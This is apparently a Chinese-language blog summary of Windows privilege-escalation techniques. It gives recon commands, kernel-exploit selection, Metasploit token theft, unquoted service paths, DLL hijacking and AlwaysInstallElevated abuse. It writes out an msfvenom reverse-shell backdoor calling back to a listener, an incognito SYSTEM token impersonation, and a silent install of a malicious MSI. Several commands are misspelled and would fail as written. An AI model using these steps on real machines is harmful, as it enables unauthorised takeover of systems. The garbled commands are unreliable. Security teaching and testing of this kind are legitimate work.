Windows提权小结
雨 夜
南山之南北海之北
一、提权简介
权限提升意味着用户获得不允许他使用的权限。比如从一个普通用户,通过“手段”让自己变为管理员用户,也可以理解为利用操作系统或软件应用程序中的错误,设计缺陷或配置错误来获得对更高访问权限的行为。
提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。
Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等
二、常用信息收集
systeminfo 查询系统信息hostname 主机名net user 查看用户信息netstat -ano|find "3389" 查看服务pid号wmic os get caption 查看系统名wmic qfe get Description,HotFixID,InstalledOn查看补丁信息wmic product get name,version 查看当前安装程序wmic service list brief 查询本机服务wmic process list brief 查询本机进程net share 查看本机共享列表netsh firewall show config 查看防火墙配置
三、常见的提权方法
1、内核提权
内核漏洞利用程序是利用内核漏洞来执行具有更高权限的任意代码的程序。成功的内核利用通常会以root命令提示符的形式为攻击者提供对目标系统的超级用户访问权限。
第一步:利用WindowsVulnScan工具对系统补丁进行收集,工具自带KBCollect.ps这个脚本,直接跑就ok,收集完了会生成KB.json
第二步:使用脚本对补丁进行检测,看看那些没有打
第三步:选择相对于的EXP进行提权,这里推荐Kernelhub、Windows-exploits,网上很多.
第四步:这选择的烂土豆的EXP,直接运行。
2、令牌窃取
此种提权方法使用2008以前。
先生成一个后门,设置监听,后门传到服务器上。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.134 LPORT=4444 -f exe > /test.exe //后门msfconsole //打开msfuse exploit/multi/handler //设置监听模块set payload windows/meterpreter/reverse_tcp //设置payload后面就是设置ip和端口了
收到监听会话,然后执行以下命令
use incognitolist_tokens -u //执行到这时可以看到system了impersonate_tokn "NT AUTHORITY\SYSTE"//窃取权限
getuid //查看权限,此时就发现是system了
3、可信任服务路径漏洞
如果一个服务的可执行文件的路径没有被双引号引起来且包含空格,那么这个服务就是有漏洞的
漏洞原理
这里假设有一个服务路径
C:\Program Files (x86)\CommonFiles\Tencent\QQMusic\QQMusicService.exe
利用方法
两种方法:
带引号时:"C:\Program Files (x86)\Common Files\Tencent\QQMusic\QQMusicService.exe"会被看成一个完整的服务路径,故不会产生漏洞。不带引号时:我们认为的服务路径是C:\Program Files (x86)\Common Files\Tencent\QQMusic\QQMusicService.exe,但是由于没有双引号的包裹,Windows会认为C:\Program空格后面的为Program这个程序的参数来进行启动服务。这样攻击者就可以命名一个为Program.exe的后门文件放在c盘下,进而等待含漏洞服务路径的启动或重启导致后门文件的执行。
寻找漏洞
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\"|findstr /i /v ""
这里要注意的是正常接收到会话后,不久就会自动断开连接,需要迁移。
4、DLL劫持
原理:Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。应用程序寻找DLL的过程:
1.程序所在目录
2.系统目录即 SYSTEM32 目录
3.16位系统目录即 SYSTEM 目录
4.Windows目录
5.加载 DLL 时所在的当前目录
6.PATH环境变量中列出的目录
过程:信息收集-进程调试-制作 dll 并上传-替换 dll-启动应用后成功
5、注册表提权
lwaysInstallElevated是一项功能,可为Windows计算机上的所有用户(尤其是低特权用户)提供运行任何具有高权限的MSI文件的功能。MSI是基于Microsoft的安装程序软件包文件格式,用于安装,存储和删除程序。
通过组策略中的windows installer来进行配置,默认情况下该配置是关闭的。
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevate
如果开启状态,msfvenom去生成一个msi马,安装msi就可以,同时msf进行监听。
msiexec /quiet /qn /i C:\Windows\Temp\1.msi
